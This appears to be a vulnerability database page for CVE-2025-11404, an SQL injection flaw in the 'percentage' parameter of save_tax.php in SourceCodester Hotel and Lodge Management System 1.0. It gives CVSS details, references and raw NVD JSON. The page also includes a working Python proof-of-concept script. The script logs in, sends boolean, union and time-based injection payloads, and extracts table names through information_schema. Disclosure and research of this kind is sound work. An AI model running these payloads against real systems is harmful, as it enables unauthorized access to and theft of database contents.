CVE-2025-11404

Description

A vulnerability was determined in SourceCodester Hotel and Lodge Management System 1.0. This affects an unknown part of the file /pages/save_tax.php. Executing manipulation of the argument percentage can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Hotel and Lodge Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11404 SQL Injection PoC
# Target: SourceCodester Hotel and Lodge Management System 1.0
# Vulnerable file: /pages/save_tax.php
# Vulnerable parameter: percentage

import requests

# Target configuration
TARGET_URL = "http://target-host.com"
LOGIN_URL = f"{TARGET_URL}/login.php"
SAVE_TAX_URL = f"{TARGET_URL}/pages/save_tax.php"

# Attacker credentials (low privilege account required)
USERNAME = "test_user"
PASSWORD = "test_password"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login to obtain authenticated session
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Craft SQL injection payload for the 'percentage' parameter
# Boolean-based blind SQL injection test
sqli_payload = "1' AND 1=1-- -"

# Alternative: Union-based SQL injection to extract data
union_payload = "1' UNION SELECT 1,user(),database(),version()-- -"

# Alternative: Time-based blind SQL injection
time_payload = "1' AND SLEEP(5)-- -"

# Step 3: Send the malicious request
data = {
    "percentage": sqli_payload,
    # Additional parameters may be required depending on the form
    "tax_name": "test",
    "submit": "Save"
}

response = session.post(SAVE_TAX_URL, data=data)

# Step 4: Analyze response for SQL injection confirmation
if response.status_code == 200:
    print("[+] Request successful")
    print(f"[+] Response length: {len(response.text)}")
    # Check for SQL error messages or data leakage
    if "error" in response.text.lower() or "sql" in response.text.lower():
        print("[!] Possible SQL injection detected in response")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Step 5: Extract database information using UNION-based injection
extract_data = {
    "percentage": "1' UNION SELECT group_concat(table_name),2,3 FROM information_schema.tables WHERE table_schema=database()-- -",
    "tax_name": "test",
    "submit": "Save"
}
response = session.post(SAVE_TAX_URL, data=extract_data)
print(f"[+] Extracted data: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11404
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11404
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11404/
[4] VulDB https://vuldb.com/cve/CVE-2025-11404
[5] https://github.com/TThuyyy/cve1/issues/12
[6] https://vuldb.com/?ctiid.327341
[7] https://vuldb.com/?id.327341
[8] https://vuldb.com/?submit.665113
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11404", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:35.930", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in SourceCodester Hotel and Lodge Management System 1.0. This affects an unknown part of the file /pages/save_tax.php. Executing manipulation of the argument percentage can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "01868A61-18A4-4C5D-B260-54D49603028E"}]}]}], "references": [{"url": "https://github.com/TThuyyy/cve1/issues/12", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327341", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327341", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665113", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}]}}